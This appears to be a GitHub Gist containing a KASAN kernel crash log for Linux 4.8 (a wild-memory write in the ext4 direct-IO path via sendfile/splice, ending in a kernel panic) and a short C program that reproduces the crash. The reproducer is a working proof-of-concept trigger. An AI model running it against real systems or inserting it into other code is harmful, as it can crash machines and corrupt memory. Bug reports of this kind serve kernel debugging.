-
-
Save marcograss/40850adb3c599ac38e0beac31617d56b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
[ 29.405419] ================================================================== | |
[ 29.406609] BUG: KASAN: wild-memory-access on address 0005080000000000 | |
[ 29.407649] Write of size 512 by task write512/1684 | |
[ 29.408539] CPU: 0 PID: 1684 Comm: write512 Not tainted 4.8.0+ #27 | |
[ 29.409574] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 | |
[ 29.411152] ffff88011bf6f370 ffffffff81bf7811 ffff88011bf6f408 0000000000000200 | |
[ 29.412457] 0000000000000000 ffff88007b50c000 ffff88011bf6f3f8 ffffffff815d952f | |
[ 29.413780] ffff88011bf6f420 1ffff100237ede78 ffff88011bf6f448 0000000000000297 | |
[ 29.414867] Call Trace: | |
[ 29.415337] [<ffffffff81bf7811>] dump_stack+0x83/0xb2 | |
[ 29.416228] [<ffffffff815d952f>] kasan_report_error+0x41f/0x500 | |
[ 29.417125] [<ffffffff81c37636>] ? iov_iter_get_pages+0x266/0xd70 | |
[ 29.418003] [<ffffffff815d9c28>] kasan_report+0x58/0x60 | |
[ 29.418752] [<ffffffff816f91bd>] ? do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.419654] [<ffffffff815d82dc>] check_memory_region+0x13c/0x1a0 | |
[ 29.420459] [<ffffffff815d8713>] memset+0x23/0x40 | |
[ 29.421089] [<ffffffff816f91bd>] do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.422035] [<ffffffff81348c0b>] ? from_kuid+0x1fb/0x280 | |
[ 29.422905] [<ffffffff817e28c7>] ? ext4_inode_csum_set+0xc7/0x4f0 | |
[ 29.423869] [<ffffffff816f73b0>] ? dio_send_cur_page+0x1ab0/0x1ab0 | |
[ 29.424906] [<ffffffff8111f4de>] ? update_stack_state.constprop.4+0xde/0x150 | |
[ 29.426086] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.427088] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.428069] [<ffffffff816ffdba>] __blockdev_direct_IO+0xaa/0xe0 | |
[ 29.429050] [<ffffffff817f85af>] ext4_direct_IO+0xc1f/0x12a0 | |
[ 29.429833] [<ffffffff81c9bc26>] ? depot_save_stack+0x1c6/0x5e0 | |
[ 29.430660] [<ffffffff814c2640>] generic_file_read_iter+0x8e0/0x1780 | |
[ 29.431640] [<ffffffff810b352b>] ? save_stack_trace+0x1b/0x20 | |
[ 29.432598] [<ffffffff815d8406>] ? save_stack+0x46/0xd0 | |
[ 29.433473] [<ffffffff815d867d>] ? kasan_kmalloc+0xad/0xe0 | |
[ 29.434386] [<ffffffff815d57a8>] ? __kmalloc+0x128/0x210 | |
[ 29.435238] [<ffffffff81651dfd>] ? alloc_pipe_info+0x27d/0x380 | |
[ 29.436241] [<ffffffff816d41d0>] ? splice_direct_to_actor+0x620/0x800 | |
[ 29.437355] [<ffffffff816d455d>] ? do_splice_direct+0x1ad/0x270 | |
[ 29.438229] [<ffffffff8163b7d1>] ? SyS_sendfile64+0xc1/0x140 | |
[ 29.439097] [<ffffffff82d0f9fb>] ? entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.439933] [<ffffffff814c1d60>] ? wait_on_page_bit_killable+0x250/0x250 | |
[ 29.440845] [<ffffffff816d31f9>] generic_file_splice_read+0x309/0x690 | |
[ 29.441619] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.442348] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.443029] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.443669] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.444500] [<ffffffff816d3b4f>] do_splice_to+0x10f/0x170 | |
[ 29.445191] [<ffffffff816d3e07>] splice_direct_to_actor+0x257/0x800 | |
[ 29.446106] [<ffffffff816d1f60>] ? generic_pipe_buf_nosteal+0x20/0x20 | |
[ 29.447099] [<ffffffff816d3bb0>] ? do_splice_to+0x170/0x170 | |
[ 29.447880] [<ffffffff81a09f5e>] ? security_file_permission+0x8e/0x1f0 | |
[ 29.448951] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.449822] [<ffffffff816d455d>] do_splice_direct+0x1ad/0x270 | |
[ 29.450649] [<ffffffff816d43b0>] ? splice_direct_to_actor+0x800/0x800 | |
[ 29.451637] [<ffffffff81acfc77>] ? apparmor_file_permission+0x27/0x30 | |
[ 29.452712] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.453530] [<ffffffff816399b0>] do_sendfile+0x530/0xcd0 | |
[ 29.454201] [<ffffffff81639480>] ? do_compat_pwritev64.isra.24+0x100/0x100 | |
[ 29.455086] [<ffffffff81acf9b5>] ? common_file_perm+0x2d5/0x370 | |
[ 29.455732] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.456571] [<ffffffff8163b7d1>] SyS_sendfile64+0xc1/0x140 | |
[ 29.457228] [<ffffffff8163b710>] ? SyS_sendfile+0x140/0x140 | |
[ 29.457871] [<ffffffff8162fcef>] ? SyS_fallocate+0x6f/0x90 | |
[ 29.458493] [<ffffffff82d0f9fb>] entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.459135] ================================================================== | |
[ 29.460001] Disabling lock debugging due to kernel taint | |
[ 29.460683] kasan: CONFIG_KASAN_INLINE enabled | |
[ 29.461086] kasan: GPF could be caused by NULL-ptr deref or user memory access | |
[ 29.461762] general protection fault: 0000 [#1] SMP KASAN | |
[ 29.462223] Modules linked in: | |
[ 29.462525] CPU: 0 PID: 1684 Comm: write512 Tainted: G B 4.8.0+ #27 | |
[ 29.463193] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 | |
[ 29.464433] task: ffff88011a9b8d80 task.stack: ffff88011bf68000 | |
[ 29.465044] RIP: 0010:[<ffffffff81c2a8b4>] [<ffffffff81c2a8b4>] __memset+0x24/0x30 | |
[ 29.465958] RSP: 0018:ffff88011bf6f460 EFLAGS: 00010206 | |
[ 29.466560] RAX: 0000000000000000 RBX: 0005080000000000 RCX: 0000000000000040 | |
[ 29.467472] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0005080000000000 | |
[ 29.468278] RBP: ffff88011bf6f480 R08: fffffbfff07b68d0 R09: 0005080000000000 | |
[ 29.469093] R10: ffff88011bf6f29f R11: fffffbfff07b68d0 R12: 0000000000000200 | |
[ 29.469947] R13: 0000000000000000 R14: ffff88007b50c000 R15: ffff8800799d6c00 | |
[ 29.470773] FS: 00007f4c154f4700(0000) GS:ffff88007dc00000(0000) knlGS:0000000000000000 | |
[ 29.471727] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 | |
[ 29.472401] CR2: 00007f4c152d72e0 CR3: 000000007a77b000 CR4: 00000000000006f0 | |
[ 29.473260] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 | |
[ 29.474091] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 | |
[ 29.474905] Stack: | |
[ 29.475157] ffffffff815d8721 0000000000000000 ffff88011a9b8d80 0000000000000200 | |
[ 29.476012] ffff88011bf6f7d0 ffffffff816f91bd 0000000000000000 ffff88007ad7bb80 | |
[ 29.476797] ffff88011a9b9510 ffff88011a9b8d80 ffff88011bf6f5c0 ffff88007ad7aa80 | |
[ 29.477614] Call Trace: | |
[ 29.477877] [<ffffffff815d8721>] ? memset+0x31/0x40 | |
[ 29.478392] [<ffffffff816f91bd>] do_blockdev_direct_IO+0x1e0d/0x8960 | |
[ 29.479041] [<ffffffff81348c0b>] ? from_kuid+0x1fb/0x280 | |
[ 29.479605] [<ffffffff817e28c7>] ? ext4_inode_csum_set+0xc7/0x4f0 | |
[ 29.480200] [<ffffffff816f73b0>] ? dio_send_cur_page+0x1ab0/0x1ab0 | |
[ 29.480816] [<ffffffff8111f4de>] ? update_stack_state.constprop.4+0xde/0x150 | |
[ 29.481556] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.482207] [<ffffffff817e71d0>] ? ext4_dax_get_block+0xd0/0xd0 | |
[ 29.482858] [<ffffffff816ffdba>] __blockdev_direct_IO+0xaa/0xe0 | |
[ 29.483502] [<ffffffff817f85af>] ext4_direct_IO+0xc1f/0x12a0 | |
[ 29.484097] [<ffffffff81c9bc26>] ? depot_save_stack+0x1c6/0x5e0 | |
[ 29.484696] [<ffffffff814c2640>] generic_file_read_iter+0x8e0/0x1780 | |
[ 29.485364] [<ffffffff810b352b>] ? save_stack_trace+0x1b/0x20 | |
[ 29.485960] [<ffffffff815d8406>] ? save_stack+0x46/0xd0 | |
[ 29.486514] [<ffffffff815d867d>] ? kasan_kmalloc+0xad/0xe0 | |
[ 29.487112] [<ffffffff815d57a8>] ? __kmalloc+0x128/0x210 | |
[ 29.487703] [<ffffffff81651dfd>] ? alloc_pipe_info+0x27d/0x380 | |
[ 29.488345] [<ffffffff816d41d0>] ? splice_direct_to_actor+0x620/0x800 | |
[ 29.489027] [<ffffffff816d455d>] ? do_splice_direct+0x1ad/0x270 | |
[ 29.489652] [<ffffffff8163b7d1>] ? SyS_sendfile64+0xc1/0x140 | |
[ 29.490247] [<ffffffff82d0f9fb>] ? entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.490933] [<ffffffff814c1d60>] ? wait_on_page_bit_killable+0x250/0x250 | |
[ 29.491643] [<ffffffff816d31f9>] generic_file_splice_read+0x309/0x690 | |
[ 29.492372] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.492934] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.493648] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.494215] [<ffffffff816d2ef0>] ? add_to_pipe+0x340/0x340 | |
[ 29.494790] [<ffffffff816d3b4f>] do_splice_to+0x10f/0x170 | |
[ 29.495369] [<ffffffff816d3e07>] splice_direct_to_actor+0x257/0x800 | |
[ 29.496015] [<ffffffff816d1f60>] ? generic_pipe_buf_nosteal+0x20/0x20 | |
[ 29.496764] [<ffffffff816d3bb0>] ? do_splice_to+0x170/0x170 | |
[ 29.497431] [<ffffffff81a09f5e>] ? security_file_permission+0x8e/0x1f0 | |
[ 29.498227] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.498824] [<ffffffff816d455d>] do_splice_direct+0x1ad/0x270 | |
[ 29.499554] [<ffffffff816d43b0>] ? splice_direct_to_actor+0x800/0x800 | |
[ 29.500423] [<ffffffff81acfc77>] ? apparmor_file_permission+0x27/0x30 | |
[ 29.501345] [<ffffffff81636aaa>] ? rw_verify_area+0xea/0x2b0 | |
[ 29.502173] [<ffffffff816399b0>] do_sendfile+0x530/0xcd0 | |
[ 29.502980] [<ffffffff81639480>] ? do_compat_pwritev64.isra.24+0x100/0x100 | |
[ 29.503998] [<ffffffff81acf9b5>] ? common_file_perm+0x2d5/0x370 | |
[ 29.504858] [<ffffffff81706093>] ? __fsnotify_parent+0x63/0x2b0 | |
[ 29.505754] [<ffffffff8163b7d1>] SyS_sendfile64+0xc1/0x140 | |
[ 29.506674] [<ffffffff8163b710>] ? SyS_sendfile+0x140/0x140 | |
[ 29.507622] [<ffffffff8162fcef>] ? SyS_fallocate+0x6f/0x90 | |
[ 29.508442] [<ffffffff82d0f9fb>] entry_SYSCALL_64_fastpath+0x1e/0xad | |
[ 29.509351] Code: 90 90 90 90 90 90 90 0f 1f 44 00 00 49 89 f9 48 89 d1 83 e2 07 48 c1 e9 03 40 0f b6 f6 48 b8 01 01 01 01 01 01 01 01 48 0f af c6 <f3> 48 ab 89 d1 f3 aa 4c 89 c8 c3 90 49 89 f9 40 88 f0 48 89 d1 | |
[ 29.513129] RIP [<ffffffff81c2a8b4>] __memset+0x24/0x30 | |
[ 29.513734] RSP <ffff88011bf6f460> | |
[ 29.514336] ---[ end trace 590e2d88ab8960f7 ]--- | |
[ 29.514845] Kernel panic - not syncing: Fatal exception | |
[ 29.515992] Kernel Offset: disabled | |
[ 29.516409] ---[ end Kernel panic - not syncing: Fatal exception | |
*/ | |
#include <sys/syscall.h> | |
#include <unistd.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#define _GNU_SOURCE | |
#include <fcntl.h> | |
#include <sys/sendfile.h> | |
int main() | |
{ | |
int ret = 0; | |
int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40); | |
ret = fcntl(fd, 4, 0x44000, 0, 0, 0); | |
ret = fallocate(fd, 0, 0x21, 0xafa6); | |
off_t offset = 0; | |
ret = sendfile(fd, fd, &offset, 0x800); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment